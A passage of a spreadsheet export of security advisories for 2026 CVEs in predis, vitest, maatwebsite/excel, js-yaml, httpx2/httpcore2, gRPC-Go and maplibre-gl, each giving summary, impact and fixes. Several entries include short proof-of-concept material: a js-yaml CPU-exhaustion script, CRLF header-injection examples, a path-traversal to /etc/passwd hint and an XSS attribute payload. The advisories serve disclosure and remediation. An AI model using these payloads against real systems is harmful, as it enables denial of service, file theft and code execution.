404s). With two shards this is ~50% per attempt — retry `PAD0`, `PAD1`, … until
the request returns 500. More shards make the attack **easier**: the per-attempt
hit probability is `(N-1)/N`, so on production clusters with many shards the
first request succeeds with near-certainty.

Verified result: `dbsize` across both shards drops 100 → 62; one shard was wiped
by a `FLUSHDB` the application never issued (it only ever ran `GET`/`SET` on
normal keys). The fix was confirmed A/B: the same PoC wipes a shard on the parent
of commit `053cb4b6` and fails on `053cb4b6`.

### Impact

CWE-93 (Improper Neutralization of CRLF Sequences) leading to Redis command
injection / protocol smuggling and denial of service. Any application on
**predis/predis 3.0.0-RC1 – 3.2.0** that calls `pipeline()` on a cluster or
replication connection and includes attacker-influenced data (values **or**
keys — e.g. cache keys built from URL slugs) in the pipelined commands is
affected. This is a common pattern for cache lookups, sessions and queued
writes.

- **Cluster:** unauthenticated remote command injection — shard-wide cache wipe
  (`FLUSHDB`), targeted destruction (`DEL`), cache poisoning (`SET`), same-slot
  key theft (`GET`), node memory exhaustion (key flood), possible cluster outage
  (`CLUSTER FLUSHSLOTS`).
- **Replication:** reliable unauthenticated DoS on every affected request.

### Remediation

Upgrade to **predis/predis 3.3.0 or later**. The fix (PR #1586, commit
`053cb4b6`) makes pipelines on aggregate connections write each command using the
real `Command` object, eliminating the second, byte-splitting parser.

Users who cannot upgrade immediately should avoid calling `pipeline()` on
aggregate (cluster / replication) connections with any attacker-influenced keys
or values; there is no reliable in-application way to neutralize the embedded
`\r\n` while the second parser remains in the code path.</t></is></c><c r="S128" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84372</t></is></c></row><row r="129"><c r="A129" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B129" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C129" s="5" t="inlineStr"><is><t>CVE-2026-84373</t></is></c><c r="D129" s="5" t="inlineStr" /><c r="E129" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F129" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G129" s="5" t="inlineStr" /><c r="H129" s="5" t="n"><v>0.004</v></c><c r="I129" s="5" t="inlineStr" /><c r="J129" s="5" t="inlineStr" /><c r="K129" s="5" t="inlineStr" /><c r="L129" s="5" t="inlineStr"><is><t>npm:@vitest/mocker, npm:vitest</t></is></c><c r="M129" s="5" t="inlineStr"><is><t>4.1.11, 5.0.0-rc.2</t></is></c><c r="N129" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O129" s="5" t="inlineStr" /><c r="P129" s="5" t="inlineStr" /><c r="Q129" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R129" s="5" t="inlineStr"><is><t>## Summary
`@vitest/mocker` registers a redirect mock's target path without validating it
against the dev server's file-serving allowlist. An attacker who can reach the
dev server's WebSocket can register a redirect mock pointing outside the project
root; when the mocked module is requested, the plugin's `load` hook returns
`readFile(&lt;attacker path&gt;)` as the module source, disclosing local files.

This is exploitable **without authentication** only through the public
`mockerPlugin` / standalone `interceptorPlugin` exports (used by third-party dev
servers), which register the handler on Vite's unauthenticated HMR socket.
Vitest's own browser mode registers mocks over a **token-authenticated** RPC and
is not remotely reachable by default (see Scope).

## Affected code
`packages/mocker/src/node/interceptorPlugin.ts`.

The `load` hook is the file-read sink:

```ts
if (mock.type === 'redirect') {
  return readFile(mock.redirect, 'utf-8')
}
```

`mock.redirect` is derived from client input at registration time with no
boundary check:

```ts
if (event.type === 'redirect') {
  const redirectUrl = new URL(event.redirect)
  event.redirect = join(server.config.root, redirectUrl.pathname)
}
registry.register(event)
```

There is no `server.fs.allow` / `server.fs.deny` check and no assertion that the
resolved path stays within the project root.

## Registration paths and trust boundaries
- **Public `mockerPlugin` / `interceptorPlugin` (unauthenticated).** In
  `configureServer`, the plugin registers `server.ws.on('vitest:interceptor:register', …)`
  on Vite's HMR WebSocket. That socket performs no token, Origin, or same-origin
  check, so any client that can reach it can register a redirect mock. This is
  the path the "unauthenticated" impact applies to.
- **Vitest browser mode (authenticated).** Mocks register over the browser RPC
  (`registerMock`), which sits behind a per-run token (`isValidApiRequest`, a
  random `api.token`). The interceptor's `configureServer` socket is not used for
  registration here (in v5 it does not run at all, as the plugin is injected per
  environment). The same missing boundary check exists on the authenticated RPC
  path, but reaching it requires the token, so it is not a remote-unauthenticated
  read.

## Path handling
`new URL(redirect).pathname` combined with `join(root, pathname)` does **not**
confine reads to the root:

- Special/hierarchical schemes (`file:`, `http:`) are normalized by WHATWG URL,
  so `..` segments are collapsed and the result stays under the root. Payloads of
  the form `file:///../../etc/passwd` do **not** escape.
- A non-special (opaque) scheme preserves `..` in `pathname`, so
  `join(root, "../../…/etc/passwd")` resolves outside the root and reads an
  arbitrary file.

Even without escaping the root, the missing `server.fs` check allows reading any
in-root file the dev server would otherwise refuse to serve (for example an
in-root `.env` or source that is denied by `server.fs.deny`).

## Scope / preconditions
- This is a **development-server** issue. The dev server binds to `localhost` by
  default and is not reachable from the network unless the developer exposes it
  (`server.host` / `0.0.0.0`, a LAN bind, or a proxy).
- A raw (non-browser) client against a reachable server bypasses browser origin
  and CORS protections entirely and can both register the mock and read the
  response.
- A browser-based drive-by against a localhost server is substantially mitigated
  by Vite defaults: the default CORS origin allowlist is limited to `localhost`
  origins, and `server.allowedHosts` blocks DNS-rebinding, so a cross-origin page
  cannot read the file contents back.

## Impact
Disclosure of local files readable by the dev-server process (source, in-root
`.env`/secrets, and, via the opaque-scheme payload, files outside the project
root). No integrity or availability impact.

## Affected versions
Present since `@vitest/mocker` was introduced.

- **Affected: `@vitest/mocker` &gt;= 2.1.0** (shipped in `vitest` and
  `@vitest/browser` &gt;= 2.1.0), through 4.1.x and the 5.0.0 pre-releases.
- **Fixed:** Vitest 4.1.11 and 5.0.0. Older majors (2.1.x, 3.x) are not
  maintained and are not planned to receive the fix.

## Fix
Validate the resolved redirect target against Vite's file-serving allowlist
(`isFileLoadingAllowed`) before registering it, at every registration site, and
stop registering the interceptor WebSocket events in Vitest's browser mode
(mocks there flow through the authenticated RPC).</t></is></c><c r="S129" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84373</t></is></c></row><row r="130"><c r="A130" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B130" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C130" s="5" t="inlineStr"><is><t>CVE-2026-84374</t></is></c><c r="D130" s="5" t="inlineStr" /><c r="E130" s="5" t="inlineStr" /><c r="F130" s="5" t="inlineStr" /><c r="G130" s="5" t="inlineStr" /><c r="H130" s="5" t="n"><v>0.006</v></c><c r="I130" s="5" t="inlineStr" /><c r="J130" s="5" t="inlineStr" /><c r="K130" s="5" t="inlineStr" /><c r="L130" s="5" t="inlineStr"><is><t>composer:maatwebsite/excel</t></is></c><c r="M130" s="5" t="inlineStr"><is><t>3.1.70</t></is></c><c r="N130" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O130" s="5" t="inlineStr" /><c r="P130" s="5" t="inlineStr" /><c r="Q130" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="R130" s="5" t="inlineStr"><is><t>### Summary

`Excel::store()` resolved the destination path against the process working
directory rather than the configured filesystem disk. When that path resolved to
an existing file, the export was written straight to it with `fopen()`,
bypassing the disk entirely. An application that passes a user-controlled value
as the export path could therefore be made to overwrite an arbitrary existing
file that the PHP process can write to, with content the user controls.

### Details

`Maatwebsite\Excel\Files\Disk::copy()` contained two paths:

```php
if (realpath($destination)) {
    $tempStream = fopen($destination, 'rb+');
    $success    = stream_copy_to_stream($readStream, $tempStream) !== false;
} else {
    $success = $this-&gt;put($destination, $readStream);
}
```

`$destination` is the `$filePath` argument given to `Excel::store()`,
`$export-&gt;store()` or `-&gt;storeExcel()`. `realpath()` resolves it against the
**current working directory** — `public/` for a typical web request — not
against the disk root. On a hit, the write went directly to the filesystem and
never reached Flysystem, which would otherwise have rejected `../` traversal and
confined absolute paths to the disk root. The disk argument was effectively
ignored for those paths, including for remote disks such as S3.

Two consequences follow:

* the destination could be any existing file the PHP process can write, in or
  out of the disk root;
* the stream was opened `'rb+'`, which does not truncate, so a shorter export
  left trailing bytes of the previous file behind.

Because the file must already exist, the primitive is an **overwrite** rather
than an arbitrary file creation. Overwriting a PHP file that is reachable by the
web server (for example a front controller or a cached view) turns
attacker-controlled row content into code execution, since CSV and HTML writers
emit cell values verbatim. Passing an explicit writer type to `store()` bypasses
the extension-based type detection that would otherwise reject a `.php` target.

Exploitation requires the **application** to pass an unsanitized, user-controlled
value as the export path. Applications that pass a fixed or server-derived path
are not affected.

### Impact

Arbitrary overwrite of existing files writable by the PHP process, with
partially attacker-controlled content, leading to remote code execution where
the overwritten file is executed by the web server.

### Patches

Fixed in **3.1.70**. `Disk::copy()` now always writes through the configured
filesystem disk, so Flysystem enforces the disk root for every export.

Note the behaviour change: passing an absolute path to `store()` previously
wrote to that path once the file existed. Paths now always resolve relative to
the disk root. Applications that relied on that should configure a disk rooted
at the target location.

### Workarounds

For anyone unable to upgrade, validate the path before passing it to `store()` —
reject absolute paths and any `..` segment, or derive the filename server-side
and never build it from request input:

```php
$name = basename($request-&gt;input('filename'));   // strips any directory part
Excel::store($export, 'exports/' . $name, 'local');
```

### Credit

Reported responsibly by @seck19 via the contact address in `SECURITY.md`.</t></is></c><c r="S130" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84374</t></is></c></row><row r="131"><c r="A131" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B131" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C131" s="5" t="inlineStr"><is><t>CVE-2026-84375</t></is></c><c r="D131" s="5" t="inlineStr" /><c r="E131" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F131" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G131" s="5" t="inlineStr" /><c r="H131" s="5" t="n"><v>0.004</v></c><c r="I131" s="5" t="inlineStr" /><c r="J131" s="5" t="inlineStr" /><c r="K131" s="5" t="inlineStr" /><c r="L131" s="5" t="inlineStr"><is><t>npm:js-yaml</t></is></c><c r="M131" s="5" t="inlineStr"><is><t>3.15.2, 4.3.2</t></is></c><c r="N131" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O131" s="5" t="inlineStr" /><c r="P131" s="5" t="inlineStr" /><c r="Q131" s="5" t="inlineStr"><is><t>CWE-400, CWE-407</t></is></c><c r="R131" s="5" t="inlineStr"><is><t>## Summary

`maxTotalMergeKeys` does not count empty mappings. An attacker can repeatedly merge a large sequence of them and consume significant CPU without reaching the configured limit.

## Example

```yaml
arr: &amp;arr [{}, {}, {}, ...] # N empty mappings
targets:
  - &lt;&lt;: *arr                # repeated K times
```

For every target, the loader iterates all `N` elements of `arr`. This results in `O(N * K)` work while `totalMergeKeys` remains unchanged.

## PoC

```js
import { performance } from 'node:perf_hooks'
import { load, YAML11_SCHEMA } from 'js-yaml'

const n = 20000

const src =
  'arr: &amp;arr [' + '{},'.repeat(n).slice(0, -1) + ']\n' +
  'targets:\n' +
  '  - &lt;&lt;: *arr\n'.repeat(n)

const started = performance.now()

load(src, { schema: YAML11_SCHEMA })

console.log(`${(performance.now() - started).toFixed(1)} ms`)
```

Observed results:

| N | YAML size | Time |
|---:|---:|---:|
| 800 | ~13 KB | ~20 ms |
| 3200 | ~50 KB | ~180 ms |
| 20000 | ~500 KB | ~13 s |

## Impact

An attacker can submit a relatively small YAML document that causes prolonged CPU consumption despite the default `maxTotalMergeKeys` limit.

## Fix

Count each merge-source mapping as one budget unit, in addition to counting its keys.

## Difference with v5

In v3 &amp; v4, merge is enabled by default. So, the severity score is higher.</t></is></c><c r="S131" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t></is></c></row><row r="132"><c r="A132" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B132" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C132" s="5" t="inlineStr"><is><t>CVE-2026-84378</t></is></c><c r="D132" s="5" t="inlineStr" /><c r="E132" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F132" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G132" s="5" t="inlineStr" /><c r="H132" s="5" t="n"><v>0.003</v></c><c r="I132" s="5" t="inlineStr" /><c r="J132" s="5" t="inlineStr" /><c r="K132" s="5" t="inlineStr" /><c r="L132" s="5" t="inlineStr"><is><t>pip:httpx2</t></is></c><c r="M132" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N132" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O132" s="5" t="inlineStr" /><c r="P132" s="5" t="inlineStr" /><c r="Q132" s="5" t="inlineStr"><is><t>CWE-407</t></is></c><c r="R132" s="5" t="inlineStr"><is><t>### Summary

HTTPX2's Server-Sent Events (SSE) parser repeatedly copied and rescanned buffered text when a server split one unterminated line across many response chunks. The total work grows quadratically with the length of the line. An attacker-controlled or compromised SSE endpoint can exploit this behavior to consume excessive client CPU.

### Details

Before version 2.10.0, HTTPX2 combined the complete pending SSE line with each newly received chunk and then scanned the combined text for line separators. If an SSE server sends a long line as many small chunks without a line separator, every chunk causes all previously received text to be copied and scanned again. For `n` fixed-size chunks, this results in O(n²) processing.

The behavior affects both `httpx2.Client.sse()` and `httpx2.AsyncClient.sse()`. Other response APIs do not use the SSE parsing path.

### Impact

Applications that consume SSE from an attacker-controlled or compromised endpoint can experience excessive CPU usage. A crafted stream can block a synchronous worker or the asynchronous event loop that is consuming it, degrading availability for other work in that process. Confidentiality and integrity are not affected.

### Mitigation

Upgrade to HTTPX2 2.10.0 or later. SSE parsing now accumulates incomplete line fragments and combines them only when necessary, making processing linear in the amount of received data. HTTPX2 2.10.0 also limits buffered SSE events to 1 MiB by default through `max_event_size`.

If upgrading is not immediately possible, only consume SSE from trusted endpoints and enforce an external size or time budget on the stream.</t></is></c><c r="S132" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84378</t></is></c></row><row r="133"><c r="A133" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B133" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C133" s="5" t="inlineStr"><is><t>CVE-2026-84379</t></is></c><c r="D133" s="5" t="inlineStr" /><c r="E133" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F133" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G133" s="5" t="inlineStr" /><c r="H133" s="5" t="n"><v>0.003</v></c><c r="I133" s="5" t="inlineStr" /><c r="J133" s="5" t="inlineStr" /><c r="K133" s="5" t="inlineStr" /><c r="L133" s="5" t="inlineStr"><is><t>pip:httpx2</t></is></c><c r="M133" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N133" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O133" s="5" t="inlineStr" /><c r="P133" s="5" t="inlineStr" /><c r="Q133" s="5" t="inlineStr"><is><t>CWE-93</t></is></c><c r="R133" s="5" t="inlineStr"><is><t>### Summary

HTTPX2 serializes the per-file `Content-Type` and custom headers supplied through the `files=` tuple API directly into the `multipart/form-data` body without validating custom header names or values. An attacker who can influence upload metadata passed to HTTPX2 can use CR or LF characters to terminate a multipart part header and inject additional part headers or end the part header block early.

### Details

The three-element file tuple accepts `(filename, content, content_type)`, and the four-element form accepts `(filename, content, content_type, headers)`. `FileField.render_headers()` interpolates the supplied header names and values between CRLF delimiters without validating them.

For example:

```python
import httpx2

request = httpx2.Request(
    "POST",
    "https://example.com/upload",
    headers={"Content-Type": "multipart/form-data; boundary=BOUNDARY"},
    files={
        "file": (
            "safe.txt",
            b"payload",
            "text/plain\r\nX-Injected: true",
        )
    },
)

print(request.read().decode())
```

The generated body contains an attacker-injected part header:

```text
--BOUNDARY
Content-Disposition: form-data; name="file"; filename="safe.txt"
Content-Type: text/plain
X-Injected: true

payload
--BOUNDARY--
```

The same issue affects names and values in the custom header mapping from the four-element tuple.

Field names and filenames are serialized through a separate escaping path and do not permit CRLF header injection.

### Impact

Applications are affected when they pass attacker-controlled upload metadata into the per-file `content_type` or custom `headers` arguments. The receiving server interprets injected lines as genuine multipart part headers. Depending on how that server validates and processes uploads, this can alter part semantics or bypass checks based on part headers.

This does not split the outer HTTP request: the injected headers are contained within the multipart body. The concrete security impact therefore depends on the downstream multipart parser and application behavior.

### Mitigation

Upgrade to HTTPX2 `2.11.0` or later. Patched versions reject forbidden control characters in multipart part header names and values and raise `ValueError` before serializing the request.

If upgrading is not immediately possible, applications should validate custom multipart header names as HTTP field-name tokens. They should reject NUL, CR, LF, other C0 controls except horizontal tab, and DEL in per-file content types and custom header values before passing them to HTTPX2.</t></is></c><c r="S133" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84379</t></is></c></row><row r="134"><c r="A134" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B134" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C134" s="5" t="inlineStr"><is><t>CVE-2026-84380</t></is></c><c r="D134" s="5" t="inlineStr" /><c r="E134" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F134" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G134" s="5" t="inlineStr" /><c r="H134" s="5" t="n"><v>0.002</v></c><c r="I134" s="5" t="inlineStr" /><c r="J134" s="5" t="inlineStr" /><c r="K134" s="5" t="inlineStr" /><c r="L134" s="5" t="inlineStr"><is><t>pip:httpx2</t></is></c><c r="M134" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N134" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O134" s="5" t="inlineStr" /><c r="P134" s="5" t="inlineStr" /><c r="Q134" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="R134" s="5" t="inlineStr"><is><t>### Summary

HTTPX2 can automatically add a `Content-Length` header to a request that already contains a caller-supplied `Transfer-Encoding` header. The resulting HTTP/1.1 request contains both framing headers, which can create an ambiguous message boundary and enable request smuggling or connection desynchronization when processed by intermediaries that disagree about which header takes precedence.

### Details

When a request body has a known size, HTTPX2's content encoder returns a default `Content-Length`. `Request._prepare()` applies each default header with `setdefault()`, which only checks whether that same header is already present. It does not check whether the mutually exclusive `Transfer-Encoding` header is present.

For example:

```python
import httpx2

request = httpx2.Request(
    "POST",
    "http://example.com/",
    headers={"Transfer-Encoding": "chunked"},
    content=b"test 123",
)

print(request.headers)
```

The request contains both:

```text
Transfer-Encoding: chunked
Content-Length: 8
```

On an HTTP/1.1 connection, the body is serialized using chunked transfer coding while both headers are sent on the wire. This violates HTTP message-framing requirements. Fixed-size byte, JSON, form, and known-length multipart bodies can reach the affected path.

Streaming bodies with an explicit `Content-Length` are not affected in current HTTPX2 releases because the automatically generated `Transfer-Encoding` is already suppressed in that direction.

### Impact

An attacker may be able to use the conflicting framing headers as a request-smuggling or desynchronization primitive. Exploitation requires an application to pass attacker-controlled request framing headers and associated body data to HTTPX2, use HTTP/1.1, and communicate through a proxy or origin that accepts conflicting headers and interprets them differently from another hop.

Depending on the downstream infrastructure, successful exploitation could interfere with requests sharing a persistent connection, bypass front-end routing or authorization decisions, or poison responses or caches. Applications that do not forward attacker-controlled `Transfer-Encoding` headers are not directly exposed.

### Mitigation

Upgrade to HTTPX2 `2.11.0` or later. Patched versions treat `Content-Length` and `Transfer-Encoding` as mutually exclusive when applying automatically generated request headers.

If upgrading is not immediately possible, remove `Transfer-Encoding` and other hop-by-hop framing headers from untrusted input before constructing outbound requests. Applications acting as proxies should derive outbound framing from the body rather than forwarding inbound `Content-Length` or `Transfer-Encoding` headers.</t></is></c><c r="S134" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84380</t></is></c></row><row r="135"><c r="A135" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B135" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C135" s="5" t="inlineStr"><is><t>CVE-2026-84381</t></is></c><c r="D135" s="5" t="inlineStr" /><c r="E135" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F135" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G135" s="5" t="inlineStr" /><c r="H135" s="5" t="n"><v>0.001</v></c><c r="I135" s="5" t="inlineStr" /><c r="J135" s="5" t="inlineStr" /><c r="K135" s="5" t="inlineStr" /><c r="L135" s="5" t="inlineStr"><is><t>pip:httpcore2, pip:httpx2</t></is></c><c r="M135" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N135" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O135" s="5" t="inlineStr" /><c r="P135" s="5" t="inlineStr" /><c r="Q135" s="5" t="inlineStr"><is><t>CWE-319</t></is></c><c r="R135" s="5" t="inlineStr"><is><t>### Summary

httpcore2 does not start TLS for `wss://` connections routed through a SOCKS5 proxy. The WebSocket opening handshake and all subsequent frames are sent in plaintext through the proxy path, despite the caller selecting the secure `wss` scheme.

The transport flaw affects httpcore2 releases before `2.10.0`. HTTPX2 exposed this behavior through its public `Client.websocket()` and `AsyncClient.websocket()` APIs from `2.6.0` through `2.9.1`.

### Details

The synchronous and asynchronous SOCKS5 connection implementations upgrade the established proxy tunnel to TLS only when the remote origin scheme is `https`. The equivalent check does not include `wss`. After the SOCKS5 handshake succeeds, the raw stream is therefore passed directly to the HTTP/1.1 connection, which writes the WebSocket upgrade request without first performing a TLS handshake or verifying the destination certificate.

For example, an application using HTTPX2 `2.6.0` through `2.9.1` may open an authenticated WebSocket through a SOCKS proxy:

```python
import httpx2

with httpx2.Client(proxy="socks5://proxy.example:1080") as client:
    with client.websocket(
        "wss://service.example/private?token=query-secret",
        headers={"Authorization": "Bearer header-secret"},
        cookies={"session": "cookie-secret"},
    ) as websocket:
        websocket.send_text("private message")
```

On affected versions, the stream passing through the SOCKS proxy begins with a plaintext request such as:

```text
GET /private?token=query-secret HTTP/1.1
Host: service.example
Authorization: Bearer header-secret
Cookie: session=cookie-secret
```

Before HTTPX2 `2.6.0`, the same underlying httpcore2 behavior could be reached by integrations constructing a WebSocket upgrade request through the low-level transport API, but HTTPX2 did not yet provide its native WebSocket client API.

A normal secure WebSocket server will usually reject these plaintext bytes because it expects a TLS ClientHello. However, a malicious or compromised SOCKS proxy can accept the SOCKS connection, observe the plaintext handshake, return a forged `101 Switching Protocols` response, and then read or modify WebSocket frames in both directions. An observer between the proxy and destination may also read the plaintext traffic.

RFC 6455 requires a client using a secure WebSocket connection to perform the TLS handshake before sending the WebSocket opening handshake. A `wss` URI promises confidentiality, integrity, and endpoint authentication through TLS.

### Impact

An attacker able to control or observe the SOCKS proxy path can obtain URL query parameters, authorization headers, cookies, and application messages that the caller expected TLS to protect. Because no TLS handshake occurs, certificate verification also does not occur, allowing an attacker controlling the proxy to impersonate the WebSocket server and inject or alter messages.

Only `wss://` connections routed through a SOCKS5 proxy are affected. Direct `wss://` connections and ordinary `https://` requests through SOCKS already start TLS correctly.

### Mitigation

Upgrade HTTPX2 and httpcore2 to `2.10.0` or later. Patched versions start TLS for both `https` and `wss` origins in the synchronous and asynchronous SOCKS5 connection paths.

If upgrading is not immediately possible, do not route `wss://` connections through a SOCKS proxy. Use a direct secure WebSocket connection or another transport that performs and verifies TLS to the WebSocket origin.</t></is></c><c r="S135" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t></is></c></row><row r="136"><c r="A136" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B136" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C136" s="5" t="inlineStr"><is><t>CVE-2026-84382</t></is></c><c r="D136" s="5" t="inlineStr" /><c r="E136" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F136" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G136" s="5" t="inlineStr" /><c r="H136" s="5" t="n"><v>0.004</v></c><c r="I136" s="5" t="inlineStr" /><c r="J136" s="5" t="inlineStr" /><c r="K136" s="5" t="inlineStr" /><c r="L136" s="5" t="inlineStr"><is><t>pip:httpx2</t></is></c><c r="M136" s="5" t="inlineStr"><is><t>2.12.0</t></is></c><c r="N136" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O136" s="5" t="inlineStr" /><c r="P136" s="5" t="inlineStr" /><c r="Q136" s="5" t="inlineStr"><is><t>CWE-409</t></is></c><c r="R136" s="5" t="inlineStr"><is><t>### Summary

When decoding a compressed response body (`gzip`, `deflate`, `br`, or `zstd`), HTTPX2 fully decompressed each network read before yielding content to the application. A small compressed input could therefore cause a large intermediate memory allocation, even when the application streamed the response to keep memory usage bounded.

### Details

HTTPX2's default transport reads the socket in pieces of up to 64 KiB. Before `2.12.0`, each piece was inflated completely into one intermediate allocation before any decompressed bytes were yielded.

At DEFLATE's maximum compression ratio of roughly 1032:1, a 64 KiB compressed chunk can expand to about 64 MiB in one allocation. Brotli and Zstandard responses can cause similarly large amplification. Streaming the response did not prevent these transient allocations.

### Impact

Applications that fetch resources from untrusted or attacker-influenced servers - such as webhook receivers, link unfurlers, crawlers, SSRF-reachable fetchers, and redirect followers - can experience memory pressure or out-of-memory termination when processing a malicious compressed response. No authentication or user interaction is required beyond issuing a request to the server.

### Mitigation

Upgrade to HTTPX2 `2.12.0` or later. Patched versions decompress responses incrementally with bounded intermediate buffers, including responses with multiple content encodings.</t></is></c><c r="S136" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t></is></c></row><row r="137"><c r="A137" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B137" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C137" s="5" t="inlineStr"><is><t>CVE-2026-84445</t></is></c><c r="D137" s="5" t="inlineStr" /><c r="E137" s="5" t="inlineStr" /><c r="F137" s="5" t="inlineStr" /><c r="G137" s="5" t="inlineStr" /><c r="H137" s="5" t="n"><v>0.007</v></c><c r="I137" s="5" t="inlineStr" /><c r="J137" s="5" t="inlineStr" /><c r="K137" s="5" t="inlineStr" /><c r="L137" s="5" t="inlineStr"><is><t>go:google.golang.org/grpc</t></is></c><c r="M137" s="5" t="inlineStr"><is><t>1.82.2, 1.83.2, 1.85.0-dev.0.20260825072537-93e31b48545e</t></is></c><c r="N137" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O137" s="5" t="inlineStr" /><c r="P137" s="5" t="inlineStr" /><c r="Q137" s="5" t="inlineStr"><is><t>CWE-129, CWE-248</t></is></c><c r="R137" s="5" t="inlineStr"><is><t>A vulnerability exists in gRPC-Go servers configured with `xds.NewGRPCServer()` where a crafted request missing both `:authority` and `Host` headers can cause a server panic, resulting in a Denial of Service (DoS).

Servers built with `xds.NewGRPCServer` install an xDS routing interceptor on every RPC. This interceptor looks up the request’s `:authority` header to pick a virtual host. The HTTP/2 server transport previously accepted requests that had neither `:authority` nor `Host`. When this happened, the xDS routing interceptor attempted to access the first element of an empty slice of authorities, leading to an index out of bounds panic. Since the per-RPC goroutine does not recover from panics, the entire server process would terminate.

This panic occurs in the interceptor pipeline, meaning the transport credentials handshake (TLS, mTLS, or ALTS) and HTTP/2 connection establishment must complete successfully before the crafted request can reach this logic.
- Insecure/Standard TLS: If the server permits insecure (plaintext) connections or standard credentials (where client certs are not checked), any unauthenticated remote attacker can trigger the crash.
- mTLS / ALTS: If strict transport-level authentication is enforced at the network edge or transport layer (e.g., requiring a valid client certificate), the attacker must possess valid transport credentials to initiate the stream and trigger the panic.

### Impact
An attacker can cause a complete outage of the gRPC server by sending a request missing both `:authority` and `Host` headers, provided they can successfully establish a transport connection.

### Patches
The issue has been addressed in `master` (and backported to `1.83.2` and `1.82.2`). The fix updates the HTTP/2 transport layer to reject requests missing both `:authority` and `Host` headers early, maintaining consistency with and other gRPC language implementations.</t></is></c><c r="S137" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84445</t></is></c></row><row r="138"><c r="A138" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B138" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C138" s="5" t="inlineStr"><is><t>CVE-2026-85061</t></is></c><c r="D138" s="5" t="inlineStr" /><c r="E138" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F138" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G138" s="5" t="inlineStr" /><c r="H138" s="5" t="n"><v>0.003</v></c><c r="I138" s="5" t="inlineStr" /><c r="J138" s="5" t="inlineStr" /><c r="K138" s="5" t="inlineStr" /><c r="L138" s="5" t="inlineStr"><is><t>npm:maplibre-gl</t></is></c><c r="M138" s="5" t="inlineStr"><is><t>6.4.1</t></is></c><c r="N138" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O138" s="5" t="inlineStr" /><c r="P138" s="5" t="inlineStr" /><c r="Q138" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R138" s="5" t="inlineStr"><is><t>### Impact
`DOM.sanitize()` in `src/util/dom.ts` iterated `elem.attributes` (a live `NamedNodeMap`) while calling `elem.removeAttribute()` in the same loop. Removing an attribute shifts subsequent attributes down by one index, causing the iterator to skip the adjacent attribute.

An attacker can provide an HTML payload with consecutive dangerous attributes (such as `&lt;details open onload="1" ontoggle="..."&gt;`). The first attribute is stripped while the second survives and executes upon insertion into `innerHTML` via the attribution control without requiring user interaction (zero-click XSS).

Applications rendering untrusted/third-party style attribution strings or user-supplied custom attributions are impacted.
